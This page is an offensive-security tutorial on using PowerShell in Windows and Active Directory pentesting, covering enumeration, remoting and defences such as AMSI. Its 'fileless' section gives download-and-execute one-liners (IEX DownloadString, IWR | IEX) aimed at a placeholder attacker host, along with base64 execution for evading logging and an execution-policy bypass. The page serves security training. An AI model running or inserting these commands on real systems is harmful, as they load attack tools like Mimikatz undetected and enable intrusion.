Skip to content

PowerShell for Hacking

PowerShell is at once Windows’ administration tool and the attacker’s favorite weapon in that environment. It’s installed everywhere, trusted by the system, accesses the whole .NET Framework and WMI, and lets you operate without touching disk (fileless). For the Windows & AD area, knowing PowerShell is the difference between copying commands and understanding what you do.

Unlike cmd (which passes text), PowerShell passes objects between commands (cmdlets), making processing far more powerful.

Get-ChildItem # ls / dir
Get-Content file.txt # cat
Get-Process # processes (objects, not text)
Get-Service
Get-Help <cmdlet> # built-in help
# cmdlets follow Verb-Noun: Get-, Set-, New-, Invoke-, Start-
Get-Process | Where-Object {$_.CPU -gt 100} | Sort-Object CPU -Descending | Select-Object -First 5
Get-Service | Where-Object {$_.Status -eq "Running"}

$_ is the current pipeline object; Where-Object filters, Select-Object picks properties, Sort-Object sorts.

whoami ; $env:USERNAME ; $env:COMPUTERNAME
Get-LocalUser ; Get-LocalGroupMember Administrators
# AD module / PowerView
Get-ADUser -Filter * ; Get-ADGroupMember "Domain Admins"
Get-NetUser ; Get-NetGroup ; Get-NetComputer # PowerView (see ad-enum)

In-memory download and execution (fileless)

Section titled “In-memory download and execution (fileless)”

What makes PowerShell so used by attackers: running without writing to disk.

IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP/script.ps1')
# or with Invoke-WebRequest
IWR http://YOUR_IP/tool.ps1 | IEX
# base64 execution (evades simple logging)
powershell -enc <base64>

This is how tools like PowerView, Invoke-Mimikatz, PowerUp are loaded into memory.

Enter-PSSession -ComputerName host -Credential (Get-Credential)
Invoke-Command -ComputerName host -ScriptBlock { whoami }

PowerShell Remoting (WinRM, port 5985) is legitimate administration and lateral movement at once (see Lateral Movement).

What the Blue Team knows (and why it matters to you)

Section titled “What the Blue Team knows (and why it matters to you)”

PowerShell is heavily watched: Script Block Logging (4104) records the script after deobfuscation, AMSI inspects it before execution, and Constrained Language Mode limits what you can do. That’s why the evasion area (see Defense Evasion (AMSI / AV / EDR)) spends so much on getting past these defenses. The Execution Policy is NOT security: it’s bypassed with -ep bypass.

In a Windows/AD environment, PowerShell is your enumeration interpreter, your in-memory tool loader, and your lateral-movement mechanism. Almost all offensive AD tools (PowerView, PowerUp, Rubeus via reflection) are used from PowerShell. Understanding it is operating with judgment in the biggest terrain of internal pentesting.

  • I understand PowerShell passes objects, not text
  • I use the pipeline with Where-Object/Select-Object/Sort-Object and $_
  • I enumerate users, groups, and processes (Get-*)
  • I load scripts in memory with IEX/DownloadString (fileless)
  • I use PowerShell Remoting (Enter-PSSession/Invoke-Command)
  • I know what AMSI, Script Block Logging, and Constrained Language Mode are
  • I understand Execution Policy is not a security control